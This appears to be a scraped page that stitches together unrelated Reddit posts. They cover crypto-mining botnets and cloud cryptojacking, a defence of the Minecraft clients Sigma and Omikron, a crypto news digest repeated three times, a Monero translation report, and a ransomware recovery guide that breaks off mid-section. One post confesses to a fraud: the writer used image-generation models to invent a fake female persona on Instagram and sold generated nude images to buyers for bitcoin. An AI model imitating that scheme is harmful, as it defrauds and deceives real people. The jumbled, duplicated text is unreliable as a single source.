Top 3 Crypto Mining Botnets: Smominru, DDG, and ADB.Miner ...

Symantec takes down 500k bots of botnet used for bitcoin mining

Symantec takes down 500k bots of botnet used for bitcoin mining submitted by leepfrog to Bitcoin [link] [comments]

New cloud threats as attackers embrace the power of cloud

When Apple Inc. launched its iCloud service in 2011, cloud threats didn’t include the Chinese government. Apple changed its policy in February of this year and conceded to Chinese authorities’ demands to store mainland residents’ encryption keys in data centers in the People’s Republic of China. Housed on local servers, run by state-backed Guizhou-Cloud Big Data Industry Co. Ltd, experts fear the Chinese government could gain access to users’ private data. Apple may be one of the wealthiest company’s in the world, but even it cannot guarantee data security in the cloud.
Consistent security for all data from third-party partners and cloud providers is what many consider the next evolution of cloud. Even when the risks associated with cloud threats are high, the cost benefits — in Apple’s case, access to a market with the world’s largest purchasing power — outweigh the risks. This matters more and more as use of cloud services grows.
Enterprise spending for public cloud services worldwide is expected to reach $160 billion in 2018, according to International Data Corporation, up 23.2% from 2017. In the U.S., discrete manufacturing, professional services and banking industries are forecast to spend the most this year on public cloud services.
Software as a service continues to have the highest growth as Microsoft, Oracle and SAP migrate their on-premises enterprise customers to subscription services in the cloud. Spending on infrastructure as a service — AWS, Microsoft Azure and others — is next, followed by platform as a service (PaaS) offered by Amazon, Microsoft, Salesforce, Google App Engine, Heroku Enterprise and more. Companies are using PaaS — operating systems and hardware — for rapid development, testing, deployment and increasingly, data management.
More power in the cloud Most platforms take advantage of public cloud security features, but large-scale clouds don’t always mean large-scale threat protection. What cloud threats should you watch out for in 2018?
Malicious cryptomining is one of the leading types of attacks since September 2017, according to Malwarebytes Labs. With the volatility in the Bitcoin market — described as the next gold rush — it’s no surprise that hackers who need massive processing power to verify and confirm transactions to blockchain have found their way to cloud servers in an attempt to earn more digital currency.
Drive-by mining In February, hackers accessed an Amazon public cloud account, owned by electric carmaker Tesla, using credentials obtained through an unsecured administrative console in Kubernetes open source orchestration software. The Tesla breach had similarities to cryptocurrency mining malware detected in the Amazon and Microsoft public clouds of SIM card manufacturer Gemalto, and multinational insurance provider Aviva, according to RedLock, the cybersecurity startup that disclosed the attacks. But the Tesla hackers used different techniques to cover their tracks. Instead of using a public mining pool — groups of cooperative miners, largely based in China — they installed “mining pool” software, hid the IP address of the server behind Cloudflare and configured the software to a nonstandard port, according to security researchers. The attackers also accessed sensitive telemetry data and other nonpublic information Tesla stored in an Amazon Simple Storage Service (S3) bucket. Tesla addressed the security problems when RedLock notified the car company.
There’s a lot of money to be made in cryptocurrency, and it is so much easier to attack IoTs with Linux malware. Mounir Hahadhead of threat research, Juniper Networks
A Los Angeles Times website called The Homicide Report maps murders and homicides — 633 people were killed in the last 12 months — in LA County. In February, attackers discovered an unsecured AWS S3 bucket. They embedded the popular cryptojacking malware Coinhive into the website for drive-by mining of visitors’ browsers and PCs. Security researcher Troy Mursch discovered the embedded JavaScript, used specifically to mine Monero, an open-source cryptocurrency released in April 2014. Author of the Bad Packets Report blog, Mursch’s internet research tracks cryptojacking and internet of things (IoT) botnets.
Linux malware that attacks embedded systems to build botnets — similar to Rakos — is going to become more prevalent. “The reason we haven’t seen it in the past is because, by trade, the people who are writing malware and doing these intrusions are heavily Windows-based,” said Mounir Hahad, head of threat research at Juniper Networks Inc. in Sunnyvale, Calif. “But as it turns out, it seems like there’s a lot of money to be made in cryptocurrency, and it is so much easier to attack IoTs with Linux malware.” In December, Juniper Threat Labs discovered Linux malware on a popular home brand of DSL routers used to build an IoT botnet for cryptocurrency mining. Juniper notified the manufacturer. Hahad expects to see more IoT botnets used for Bitcoin mining because many IoT embedded systems are Linux-based.
Signing up botnets Data shows a rise in the number of attackers that consume public cloud services to host command-and-control servers for IoT botnets and ransomware. In January, the Spamhaus Project, a nonprofit based in Geneva, released its 2017 Botnet Threat Report. Researchers at Spamhaus Malware Labs identified more than 9,500 botnet command-and-control servers on 1,122 different networks. Botnet controllers, according to Spamhaus’ block listings, increased 32% in 2017, and that data does not include controllers hosted on the dark web, where servers can’t be identified. “What stands out in 2017 is the dramatic increase of botnet controllers hosted at cloud providers,” the researchers stated. Large botnet operators are cloud threats, deploying botnet controllers in public clouds such as Amazon Web Services and Google Cloud Platform (Compute Engine) using fraudulent signups. “While some of the cloud providers managed to deal with the increase of fraudulent signups, others are obviously still struggling with the problem,” researchers said.
submitted by SwitchKanun to hashflareinfo [link] [comments]

Free to play takes an evil turn: Using gamers as a botnet to mine for bitcoins

Free to play takes an evil turn: Using gamers as a botnet to mine for bitcoins submitted by eobet to gaming [link] [comments]

Heres some proof about sigma not being a trojan and omikron client proof from the sigma creator andro

The high GPU usage is due to the GPU acceleration or the UIs. And this is not comparable to other person's GPU usage since every GPU behave differently. You can compare this usage with vanilla 1.15.2's GPU usage. In my personal case, it's about +1~8% higher.
And the overall performance loss over the 1.8 clients is due to the 1.15 itself, the heavy UI, the missing optimisations (performance update soon), the obfuscation, etc
Some people are saying that "conhost.exe" is a malware... It's actually the console process spawned by java.exe which is used by Sigma (instead of the javaw.exe, the window version of java.exe without the console, that is mostly used for Minecraft).
Fun fact: Badlion client and Lunar client are also spawning conhost, and they aren't getting called out as malwares.
Here's a great explanation of what it is: https://www.howtogeek.com/howto/4996/what-is-conhost.exe-and-why-is-it-running/

And Omikron client was not a bitcoin miner, here's the copypasta :
Omikron client didn't have any btc miner / rat / botnet or whatever. The thing running in background was a system to validate the usage of the auto alt / proxy from other computers. Therefore, if you used auto alt / auto proxy, your computer among others validated in some sort of P2P the usage of alts / proxies. If >50% of computers says that a "transaction" is good, it was validated. Omikron decided to do that to counter the abuse of auto alt / auto proxy.
But ofc you could disable that autorun in Omikron Client's setting. And it was clearly written in the client that it would autorun (but no body really read it) if you use auto alts / auto proxy.
Edit, another copypasta:
I know, this is missleading. In the code, finding alts is refenrenced as "mining" them because you have this usepass combo and sometime yay ! Its a working minecraft alt ! The whole problem about all this drama is that its old code written when the client was "ghost client" and putting it in a .m file intead of .minecraft, having the package not named omikron, not using omikron domain name in the code was a good idear to prevent memory scanning cheating software such as BLSquad to find "omikron" but as you can tell it has bring more trouble that anything. You shoudn't be scared, your cpu isn't and wont be used to mine crypto or any unwanted activity and you will soon be able to chose if you want the service to run. In the next release, beside the fact that all of this was moved to .minecraft/Omikron, using proper domain name etc, you will be able to choose if you are using the client and want the background service running to find alts or if you have the client installed but not using it you will be able to disable the background service.
The video that is spreading about Omikron client is only proving that it downloads an autorun, and runs it in the background, which is intended.

Be careful of people trying to spread that Sigma could be a virus. Most of the time, they're made up by people who are clueless and don't know about what they're talking about (ex: conhost).
submitted by Vardenisss to minecraftclients [link] [comments]

Crypto Weekly News

What important crypto events happened last week?
Cryptocurrencies
Monero Presents New Legal Framework In Defense Of Privacy Coins
Riccardo Spagni presented the result of more than a year's work. A whitepaper titled "Anti-Money Laundering Regulation of Privacy-Enabling Cryptocurrencies" has been published. The document was conceived as a new legal framework to protect confidential coins such as Monero, Zcash, Dash, Komodo, and others.
Tether Is Moving 1 Billion More USDT Coins From TRON To Ethereum Blockchain
The total supply of coins will not change. The company carried out the swap on September 15, coordinating its actions "with a third party". In recent weeks, this is the second such stablecoin transfer between blockchains — on August 20, the issuer also moved USDT 1 billion from Tron to Ethereum. Another piece of news about Tether: USDT capitalization exceeded $15 billion, having increased by $3 billion in just a month.
Projects and Updates
Kraken Receives Licence To Establish First U.S Digital Assets Bank
The Kraken Bitcoin exchange was the first in the United States to receive the status of a special purpose depository institution (SPDI), giving it the functions of a traditional financial institution. The corresponding application of the Californian company was approved by the Wyoming Banking Council. This will allow Kraken to opt-out of third-party vendors to perform certain banking functions on its own.
Official Ethereum Proof-of-Stake Algorithm Proposal Published
Ethereum Foundation Lead Developer Danny Ryan has published the official proposal EIP-2982, which suggests the launch of Ethereum 2.0 and the transition from the Proof-of-Work consensus algorithm to Proof-of-Stake. If approved by other leading developers, it will be possible to launch Serenity, Ethereum 2.0 phase zero. Within its framework, the Beacon Chain will be activated, which will use Proof-of-Stake.
Uniswap Provides All Its Users With $1.200
Leading decentralized exchange (DEX) Uniswap has released the UNI governance token. It was listed on the Binance exchange almost immediately. About 13000 Uniswap users have already requested tokens.
Regulations
New Draft Law Suggests The European Union Is Set To Regulate Cryptocurrencies
The European Commission proposed to establish a legal framework for cryptocurrencies, security tokens, and stablecoins by analogy with the requirements for traditional financial instruments. This is stated in the Cryptocurrency Asset Markets Bill. The bill proposes to treat cryptocurrency assets like any other financial instrument. According to the European Commission, this will provide legal clarity.
Digital Assets Recognized As Securities In Nigeria
The regulator clarified that cryptocurrencies offer public alternative investment opportunities. Digital assets can be used as a medium of exchange, settlement, and accumulation. In order to protect investors from risks and not violate the integrity of the market, crypto assets must be controlled on an equal basis with securities. The main task of regulation is not to discourage the development of new technologies, but to ensure fair market competition and adherence to ethical standards.
Hacking
Japanese Crypto Exchange Sues Binance for Role in $63 Million Bitcoin Hack
The Japanese company Fisco Cryptocurrency Exchange, Inc has filed a US lawsuit against Binance Holdings Ltd., accusing it of providing a service to launder cryptocurrency stolen from the Zaif exchange in 2018. Fisco acquired Zaif in 2018 shortly after the hack. Over $9 million in stolen assets could have been funneled through Binance. The company notes that analysts were able to track the movement of all stolen $63 million to one bitcoin address. Subsequently, 1,451.7 BTC were sent from it to Binance addresses.
New Virus Attacks Microsoft SQL Database Servers For Monero Mining
Tencent's cybersecurity division has discovered a new miner virus called MrbMiner. The tactics of the virus are quite simple — the botnet scans the available IP addresses in search of Microsoft SQL servers, and if it detects such, it tries to log in under the administrator account using a brute-force password. If successful, the virus downloads the assm.exe file, which implements a reboot mechanism and creates a special account for hackers to access the server. After that, MrbMiner downloads a miner for mining the anonymous cryptocurrency Monero (XMR).
Mass adoption
Bahamas Geared to Launch Central Bank Digital Currency
The Bahamas wants to be the first country in the world to roll out a government-backed virtual currency nationwide and announced they will launch a central bank-issued cryptocurrency (CBDC) in October. The digital currency, dubbed "sand dollar", is designed to increase the financial availability of remote islands within the archipelago state.
Alibaba On Track To Be The Largest Blockchain Patent Holder By End Of 2020
Computer giant IBM risks losing the title of the largest blockchain patent holder to the Chinese corporation Alibaba. Since the beginning of the year, Alibaba has published ten times more patents than its closest competitor, IBM. According to analysts, if the pace is maintained, the Chinese corporation will become the largest patent holder by the end of the year.
France Begins Central Bank Digital Currency Testing
Société Générale — one of the largest financial conglomerates in Europe — will test the central bank digital currency (CBDC) on the Tezos blockchain. The Bank of France, as a result of the selection of partners, chose the Forge blockchain platform to test CBDC for interbank settlements. As part of the experiment, the feasibility of digitizing financial securities and the possibility of settlements on them using CBDC will be studied. In addition to Nomadic Labs, several technology service providers and consultants will participate in the testing.
Kazakhstan Will Develop A Blockchain Service For Ensuring The Security Of Personal Data
It will allow citizens of the country to control the use of their personal data. The service is planned to be introduced by the end of this year.
People
Kiss Rock Group Member Is Ready To Buy Bitcoin
Gene Simmons supported Cameron Winklevoss's request to use bank accounts to buy Bitcoin and Ether. The co-founder of Gemini tweeted that people who do not have access to banking services find it difficult to become the owners of cryptocurrency and that they need to take advantage of the benefits. The musician commented as follows: "I will. I am." For this moment, the most common opinion on Twitter is that Simmons is already buying cryptocurrency and will continue to increase the amount of Bitcoin he owns.
That’s all for now! For more details follow us on Twitter, subscribe to our YouTube channel, join our Telegram.
submitted by CoinjoyAssistant to CryptoCurrencies [link] [comments]

Crypto Weekly News

What important crypto events happened last week?
Cryptocurrencies
Monero Presents New Legal Framework In Defense Of Privacy Coins
Riccardo Spagni presented the result of more than a year's work. A whitepaper titled "Anti-Money Laundering Regulation of Privacy-Enabling Cryptocurrencies" has been published. The document was conceived as a new legal framework to protect confidential coins such as Monero, Zcash, Dash, Komodo, and others.
Tether Is Moving 1 Billion More USDT Coins From TRON To Ethereum Blockchain
The total supply of coins will not change. The company carried out the swap on September 15, coordinating its actions "with a third party". In recent weeks, this is the second such stablecoin transfer between blockchains — on August 20, the issuer also moved USDT 1 billion from Tron to Ethereum. Another piece of news about Tether: USDT capitalization exceeded $15 billion, having increased by $3 billion in just a month.
Projects and Updates
Kraken Receives Licence To Establish First U.S Digital Assets Bank
The Kraken Bitcoin exchange was the first in the United States to receive the status of a special purpose depository institution (SPDI), giving it the functions of a traditional financial institution. The corresponding application of the Californian company was approved by the Wyoming Banking Council. This will allow Kraken to opt-out of third-party vendors to perform certain banking functions on its own.
Official Ethereum Proof-of-Stake Algorithm Proposal Published
Ethereum Foundation Lead Developer Danny Ryan has published the official proposal EIP-2982, which suggests the launch of Ethereum 2.0 and the transition from the Proof-of-Work consensus algorithm to Proof-of-Stake. If approved by other leading developers, it will be possible to launch Serenity, Ethereum 2.0 phase zero. Within its framework, the Beacon Chain will be activated, which will use Proof-of-Stake.
Uniswap Provides All Its Users With $1.200
Leading decentralized exchange (DEX) Uniswap has released the UNI governance token. It was listed on the Binance exchange almost immediately. About 13000 Uniswap users have already requested tokens.
Regulations
New Draft Law Suggests The European Union Is Set To Regulate Cryptocurrencies
The European Commission proposed to establish a legal framework for cryptocurrencies, security tokens, and stablecoins by analogy with the requirements for traditional financial instruments. This is stated in the Cryptocurrency Asset Markets Bill. The bill proposes to treat cryptocurrency assets like any other financial instrument. According to the European Commission, this will provide legal clarity.
Digital Assets Recognized As Securities In Nigeria
The regulator clarified that cryptocurrencies offer public alternative investment opportunities. Digital assets can be used as a medium of exchange, settlement, and accumulation. In order to protect investors from risks and not violate the integrity of the market, crypto assets must be controlled on an equal basis with securities. The main task of regulation is not to discourage the development of new technologies, but to ensure fair market competition and adherence to ethical standards.
Hacking
Japanese Crypto Exchange Sues Binance for Role in $63 Million Bitcoin Hack
The Japanese company Fisco Cryptocurrency Exchange, Inc has filed a US lawsuit against Binance Holdings Ltd., accusing it of providing a service to launder cryptocurrency stolen from the Zaif exchange in 2018. Fisco acquired Zaif in 2018 shortly after the hack. Over $9 million in stolen assets could have been funneled through Binance. The company notes that analysts were able to track the movement of all stolen $63 million to one bitcoin address. Subsequently, 1,451.7 BTC were sent from it to Binance addresses.
New Virus Attacks Microsoft SQL Database Servers For Monero Mining
Tencent's cybersecurity division has discovered a new miner virus called MrbMiner. The tactics of the virus are quite simple — the botnet scans the available IP addresses in search of Microsoft SQL servers, and if it detects such, it tries to log in under the administrator account using a brute-force password. If successful, the virus downloads the assm.exe file, which implements a reboot mechanism and creates a special account for hackers to access the server. After that, MrbMiner downloads a miner for mining the anonymous cryptocurrency Monero (XMR).
Mass adoption
Bahamas Geared to Launch Central Bank Digital Currency
The Bahamas wants to be the first country in the world to roll out a government-backed virtual currency nationwide and announced they will launch a central bank-issued cryptocurrency (CBDC) in October. The digital currency, dubbed "sand dollar", is designed to increase the financial availability of remote islands within the archipelago state.
Alibaba On Track To Be The Largest Blockchain Patent Holder By End Of 2020
Computer giant IBM risks losing the title of the largest blockchain patent holder to the Chinese corporation Alibaba. Since the beginning of the year, Alibaba has published ten times more patents than its closest competitor, IBM. According to analysts, if the pace is maintained, the Chinese corporation will become the largest patent holder by the end of the year.
France Begins Central Bank Digital Currency Testing
Société Générale — one of the largest financial conglomerates in Europe — will test the central bank digital currency (CBDC) on the Tezos blockchain. The Bank of France, as a result of the selection of partners, chose the Forge blockchain platform to test CBDC for interbank settlements. As part of the experiment, the feasibility of digitizing financial securities and the possibility of settlements on them using CBDC will be studied. In addition to Nomadic Labs, several technology service providers and consultants will participate in the testing.
Kazakhstan Will Develop A Blockchain Service For Ensuring The Security Of Personal Data
It will allow citizens of the country to control the use of their personal data. The service is planned to be introduced by the end of this year.
People
Kiss Rock Group Member Is Ready To Buy Bitcoin
Gene Simmons supported Cameron Winklevoss's request to use bank accounts to buy Bitcoin and Ether. The co-founder of Gemini tweeted that people who do not have access to banking services find it difficult to become the owners of cryptocurrency and that they need to take advantage of the benefits. The musician commented as follows: "I will. I am." For this moment, the most common opinion on Twitter is that Simmons is already buying cryptocurrency and will continue to increase the amount of Bitcoin he owns.
That’s all for now! For more details follow us on Twitter, subscribe to our YouTube channel, join our Telegram.
submitted by CoinjoyAssistant to cryptoeconomynet [link] [comments]

Crypto Weekly News — September, 18

What important crypto events happened last week?

Cryptocurrencies

Monero Presents New Legal Framework In Defense Of Privacy Coins
Riccardo Spagni presented the result of more than a year's work. A whitepaper titled "Anti-Money Laundering Regulation of Privacy-Enabling Cryptocurrencies" has been published. The document was conceived as a new legal framework to protect confidential coins such as Monero, Zcash, Dash, Komodo, and others.
Tether Is Moving 1 Billion More USDT Coins From TRON To Ethereum Blockchain
The total supply of coins will not change. The company carried out the swap on September 15, coordinating its actions "with a third party". In recent weeks, this is the second such stablecoin transfer between blockchains — on August 20, the issuer also moved USDT 1 billion from Tron to Ethereum. Another piece of news about Tether: USDT capitalization exceeded $15 billion, having increased by $3 billion in just a month.

Projects and Updates

Kraken Receives Licence To Establish First U.S Digital Assets Bank
The Kraken Bitcoin exchange was the first in the United States to receive the status of a special purpose depository institution (SPDI), giving it the functions of a traditional financial institution. The corresponding application of the Californian company was approved by the Wyoming Banking Council. This will allow Kraken to opt-out of third-party vendors to perform certain banking functions on its own.
Official Ethereum Proof-of-Stake Algorithm Proposal Published
Ethereum Foundation Lead Developer Danny Ryan has published the official proposal EIP-2982, which suggests the launch of Ethereum 2.0 and the transition from the Proof-of-Work consensus algorithm to Proof-of-Stake. If approved by other leading developers, it will be possible to launch Serenity, Ethereum 2.0 phase zero. Within its framework, the Beacon Chain will be activated, which will use Proof-of-Stake.
Uniswap Provides All Its Users With $1.200
Leading decentralized exchange (DEX) Uniswap has released the UNI governance token. It was listed on the Binance exchange almost immediately. About 13000 Uniswap users have already requested tokens.

Regulations

New Draft Law Suggests The European Union Is Set To Regulate Cryptocurrencies
The European Commission proposed to establish a legal framework for cryptocurrencies, security tokens, and stablecoins by analogy with the requirements for traditional financial instruments. This is stated in the Cryptocurrency Asset Markets Bill. The bill proposes to treat cryptocurrency assets like any other financial instrument. According to the European Commission, this will provide legal clarity.
Digital Assets Recognized As Securities In Nigeria
The regulator clarified that cryptocurrencies offer public alternative investment opportunities. Digital assets can be used as a medium of exchange, settlement, and accumulation. In order to protect investors from risks and not violate the integrity of the market, crypto assets must be controlled on an equal basis with securities. The main task of regulation is not to discourage the development of new technologies, but to ensure fair market competition and adherence to ethical standards.

Hacking

Japanese Crypto Exchange Sues Binance for Role in $63 Million Bitcoin Hack
The Japanese company Fisco Cryptocurrency Exchange, Inc has filed a US lawsuit against Binance Holdings Ltd., accusing it of providing a service to launder cryptocurrency stolen from the Zaif exchange in 2018. Fisco acquired Zaif in 2018 shortly after the hack. Over $9 million in stolen assets could have been funneled through Binance. The company notes that analysts were able to track the movement of all stolen $63 million to one bitcoin address. Subsequently, 1,451.7 BTC were sent from it to Binance addresses.
New Virus Attacks Microsoft SQL Database Servers For Monero Mining
Tencent's cybersecurity division has discovered a new miner virus called MrbMiner. The tactics of the virus are quite simple — the botnet scans the available IP addresses in search of Microsoft SQL servers, and if it detects such, it tries to log in under the administrator account using a brute-force password. If successful, the virus downloads the assm.exe file, which implements a reboot mechanism and creates a special account for hackers to access the server. After that, MrbMiner downloads a miner for mining the anonymous cryptocurrency Monero (XMR).

Mass adoption

Bahamas Geared to Launch Central Bank Digital Currency
The Bahamas wants to be the first country in the world to roll out a government-backed virtual currency nationwide and announced they will launch a central bank-issued cryptocurrency (CBDC) in October. The digital currency, dubbed "sand dollar", is designed to increase the financial availability of remote islands within the archipelago state.
Alibaba On Track To Be The Largest Blockchain Patent Holder By End Of 2020
Computer giant IBM risks losing the title of the largest blockchain patent holder to the Chinese corporation Alibaba. Since the beginning of the year, Alibaba has published ten times more patents than its closest competitor, IBM. According to analysts, if the pace is maintained, the Chinese corporation will become the largest patent holder by the end of the year.
France Begins Central Bank Digital Currency Testing
Société Générale — one of the largest financial conglomerates in Europe — will test the central bank digital currency (CBDC) on the Tezos blockchain. The Bank of France, as a result of the selection of partners, chose the Forge blockchain platform to test CBDC for interbank settlements. As part of the experiment, the feasibility of digitizing financial securities and the possibility of settlements on them using CBDC will be studied. In addition to Nomadic Labs, several technology service providers and consultants will participate in the testing.
Kazakhstan Will Develop A Blockchain Service For Ensuring The Security Of Personal Data
It will allow citizens of the country to control the use of their personal data. The service is planned to be introduced by the end of this year.

People

Kiss Rock Group Member Is Ready To Buy Bitcoin
Gene Simmons supported Cameron Winklevoss's request to use bank accounts to buy Bitcoin and Ether. The co-founder of Gemini tweeted that people who do not have access to banking services find it difficult to become the owners of cryptocurrency and that they need to take advantage of the benefits. The musician commented as follows: "I will. I am." For this moment, the most common opinion on Twitter is that Simmons is already buying cryptocurrency and will continue to increase the amount of Bitcoin he owns.
That’s all for now! For more details follow us on Twitter, subscribe to our YouTube channel, join our Telegram.
submitted by CoinjoyAssistant to u/CoinjoyAssistant [link] [comments]

August / September monthly report from v1docq47 (CCS + XRM.RU)

This is my monthly progress report (CCS.html) + XMR.RU).
Below is a list of what has been done and translated into Russian for two months of my work.

Monero Video (YouTube)

The following video posted on Monero Russian Community YouTube Channel.

Weekly News:

Short Q&A about Monero:

Monero into Russian (Translation)

The following articles / guides have been translated into Russian and posted on the XMR.RU website and my Github repository.
Note: If you would like to read the original article in English, then, open the article you are interested in, and at the end of each article you will find a link to the source.

Critical Decentralisation Cluster 36c3 (transcriptions (EN + RU) + translation (RU)):

01 - Monero Introduction (Diego "rehrar" Salazar) | Transcriptions - EN.md) / RU.md) / XMR.RU 02 - RIAT Introduction (parasew) | Transcriptions - EN.md) / RU.md) / XMR.RU 03 - Swiss Cryptoeconomics Assembly (polto, Ome) | Transcriptions - EN.md) / RU.md) / XMR.RU 04 - Namecoin Introduction (Jeremy Rand) | Transcriptions - EN.md) / RU.md) / XMR.RU 05 - Open Hardware developed at FOSSASIA (Mario Behling) | Transcriptions - EN.md) / RU.md) / XMR.RU 06 - Paralelni Polis (Juraj Bednar) | Transcriptions - EN.md) / RU.md) / XMR.RU 07 - Introduction to Replicant (dllud, Denis ‘GNUtoo’ Carikli)​ | Transcriptions - EN.md) / RU.md) / XMR.RU 08 - Open Source Hardware and OSHWA (Drew Fustini) | Transcriptions - EN.md) / RU.md) / XMR.RU 09 - ImplicitCAD (Juila Longtin) | Transcriptions - EN.md) / RU.md) / XMR.RU 10 - Program in Detail | Transcriptions - EN / RU / XMR.RU 11 - about:freedom (Bonnie Mehring, Blipp)​ | Transcriptions - EN.md) / RU.md) / XMR.RU 13 - Funding Models of FOSS (Diego “rehrar” Salazar) | Transcriptions - EN.md) / RU.md) / XMR.RU 14 - The Sharp Forks We Follow​ | Transcriptions - EN / RU / XMR.RU 16 - P2P Trading in Cryptoanarchy | Transcriptions - EN / RU / XMR.RU 17 - Monero’s Adaptive Blockweight Approach to Scaling | Transcriptions - EN / RU / XMR.RU 18 - Nym (Harry Halpin)​ | Transcriptions - EN.md) / RU.md) / XMR.RU 19 - Digital Integrity of the Human Person | Transcriptions - EN / RU / XMR.RU 20 - cyber~Congress (Sergey Simanovsky) | Transcriptions - EN.md) / RU.md) / XMR.RU 21 - KYC & Crypto-AML Tools (polto) | Transcriptions - EN.md) / RU.md) / XMR.RU 22 - Parallel Polis, Temporary Autonomous Zones and Beyond | Transcriptions - EN / RU 23 - MandelBot:HAB - Open Source Ecotecture and Horizontalism | Transcriptions - EN / RU 24 - Adventures and Experiments Adding Namecoin to Tor Browser | Transcriptions - EN / RU 25 - Fair Data Society (Gregor Zavcer) | Transcriptions - EN.md) / RU.md) / XMR.RU 45 - Designing a Communal Computing Interface | Transcriptions - EN / RU / XMR.RU 47 - Hackatoshi’s Flying Circuit | Transcriptions - EN / RU / XMR.RU

Zero to Monero - Second Edition

https://www.overleaf.com/read/hcmqnvgtfmyh - Chapter 00 - Abstract - Chapter 01 - Introduction - Chapter 02 - Basic Concepts - Chapter 03 - Advanced Schnorr-like Signatures

Monero Outreach Articles

Getmonero.org Posts Blog

LocalMonero Articles

Note: You need "Change Language" to Russian - Why Monero Has A Tail Emission - How CLSAG Will Improve Monero's Efficiency - How Monero Solved the Block Size Problem That Plagues Bitcoin - How Ring Signatures Obscure Monero's Outputs - Monero Best Practices for Beginners - Monero Outputs Explained

Monero Meeting logs

CCS Result / Report

Monero News

Other Articles

Pull / Merge Request

Monero Project Translations (Weblate)

Thanks for your support!
submitted by v1docq47 to Monero [link] [comments]

using AI in unethical ways

Hello, before I start spilling the beans let me give some background about myself. Since I was a little child my fascination on the topic of electricity and computing was immeasurable. This was not enough to be considered good at anything, everyone including myself viewed me as a failure, and I can't blame them, I didn't do any sports or had good grades. But one summer, it was about 5 years ago I have started exploring computer science, on my own. And my skills were improving really fast, but my family's constant disappointment pushed me away from anything, since my programs weren't good grades, and fuck me that I don't have good grades. This pushed me into a great depression, an insane one where I didn't felt like waking up anymore, except one day when I found out about artificial intelligence, and it's potential. At first it was just a hobby I kept secret from everyone since I don't want to let anyone know anything about me since I will be critiqued, but this hobby of mine turned into an obsession. Any money I could earn would go into video cards and any free time I had would go towards researching different AI's. My room turned into GPUs and wires. Electricity bill was getting out of hand with each day, this issue won't continue for long since I discovered an website named "this person doesn't exist", that site gave me an idea, one of the worst kinds, but quite profitable in money.
To reach that idea I have done a lot of research on genetic algorithms, deep learning, machine learning. This research gave birth to some new learning algorithms, and all of them combined let me virtual humans. At first I could get a realistic face, but it was not enough to reach my goal. I needed something to let me create poses at demand, this part took 6 months out of my life, nights I haven't slept, constant headaches and insane anxiety, not knowing if each attempt will work, all I could do is to wait until it fully trained on my dateset(who is just insane to gather enough data, and process them manually).
My nightmare ended with one algorithm who took a long time to adapt itself, but it showed potential. I wasn't deceived it kept working really well. But let's not forget why I wanted to make something that let me create a persona and pose it however I wanted, to pay my electricity bills and buy new upgrades for my botnet. So I opened an Instagram page, where I would impersonate a girl named Casey(not the name I had actually used, but I still want to keep this dirty business). She would put some provocative pictures of herself. It wasn't long until Casey(I don't identify as her, she is only an internet personality, I think) was asked for nudes so I agreed to sell them and get paid through bitcoin, my program could generate nudity with ease since all I had to do was to find what parameters influenced her clothing .
The sad part of my story is that I'm using others to live a lazy life. If you are wondering why don't I sell me work, or why don't I work in this domain officially and so on, the answer is simple, I don't have a college done, I need to work hard to gain less than I do from exploiting some horny people and I get to work on my latest project who is not related to any AI, a compiler. It might get me closer to self programming AI if I use an genetic algorithm on it. Don't expect any replies from me, since this is the first time and the last I'm logging on this account, and I hope my English didn't bothered you, it was built by many hours of playing games, farewell.
submitted by AIThrowAwayAcc to offmychest [link] [comments]

How Ransomware Encryption Happens & 4 Methods for Recovery

We know how overwhelming it can feel to be the victim of a ransomware attack and how your business cannot operate due encrypted or locked files. This page delivers insight on why your files were encrypted or locked, and the options you have to decrypt ransomware. As a ransomware recovery service provider, we have helped thousands of clients successfully recover their data and decrypt their data.
Evaluating all options will include analyzing the encrypted files, and the least desirable option to pay the ransom demand if necessary. Our process helps provide critical insight into decrypting ransomware and the available options that clients have.
By the end of this piece, it is our goal to show you what is involved to successfully recover your files. This guide outlines what steps and research are necessary to decrypt or unlock your files from a ransomware attack.

You’re the victim of a ransomware attack

You arrive to work and start noticing suspicious alerts coming from your servers, and none of the databases are functional. Your co-workers are frantic and cannot access any of their data. You investigate further and find all of the files on your network are renamed and discover ransom notes, and a screen asking you to email someone if you want your data back. You finally realize that you are a victim of a ransomware attack, and all of your files are locked or encrypted.

3 Common Ways Your Files Were Encrypted or Locked

Ransomware succeeds when businesses have poor security hygiene. Organizations that lack policies & procedures around data security will have a higher risk of ransomware attacks. Here are some of the most common ways to fall victim to a ransomware attack:

Open Remote Desktop Protocol Ports (RDP)

Businesses that have improperly configured network security may leave their Remote Desktop Protocol (RDP) ports open. Unknowingly, this is the equivalent of leaving the front door unlocked when you leave your home: it provides an opportunity for cyber attacks to come through with little deterrence.
Once a hacker is connected to your network, they can install ransomware and additional back doors to access your network at a later date. A large percentage of ransomware attacks still use this method of attack because so many organizations are not even aware of this security vulnerability.

Phishing Attacks

Ransomware can infiltrate your network by a malicious email campaign known as a phishing attack. Ransomware operators use massive networks of internet-connected devices (botnets) to send phishing emails to unsuspecting victims. These emails intend to trick the receiver into clicking on a malicious attachment or link, which can secretly install the ransomware virus or other malware.
Phishing emails are becoming increasingly difficult to detect as cybercriminals find clever ways to make a malicious email look legitimate. This underscores the importance of security awareness training for everyone in the organization, not just the I.T. department.

Compromised Passwords

The ransomware operators may have used previously compromised passwords from employees at your organization to gain unauthorized access to the networks. This derives from the poor security practices of reusing the same passwords for multiple accounts and authentication processes.
If your employees have been using old & weak passwords to access your business data, a cyber criminal can use a previously compromised password to initiate the attack. Remember to always to follow good password hygiene.
The variety of attack vectors highlights the importance of a digital forensics investigation that can help victims understand how the ransomware came onto your computer and what steps you can take to remediate the vulnerability.

4 Options for Ransomware Recovery

In this section, we cover the options to restore files encrypted or locked by ransomware.

1. Recover files with a backup

If your files become encrypted in a ransomware attack, check to see if you have backups to restore and recover (in order).

2. Recreate the data

Even though your files are encrypted by ransomware, you might be able to recreate the data from a variety of sources as outlined below:

3. Breaking the ransomware encryption

The harsh truth is that the majority of ransomware encryption is unbreakable. This impossibility is a tough concept for many of us to accept, given the technological advances of our society.
Does this mean you should skip looking into whether the ransomware encryption can be broken? This option should always be explored if presented by a ransomware recovery firm, although the final choice is yours to make. We will lay out a real life example at Proven Data below to outline why this was a great decision for a company that was infected with ransomware.
While it tends to be rare, there are poorly constructed ransomware encryptions that have been broken by security researchers. If you can avoid paying a ransom, you should at all costs.
There can be flaws in the malware or weaknesses in the encryption. Businesses can look at these options, especially if time is on your side. There are also free ransomware decryption resources that provide tools for previously decrypted ransomware variants. A client of ours had hired a ransomware recovery company to recover their files until we discovered at the very last moment through our analysis that the encryption was breakable. With less than 20 minutes to spare, we saved the client out of paying a $450,000 ransom.

Why can’t most ransomware encryption be broken?

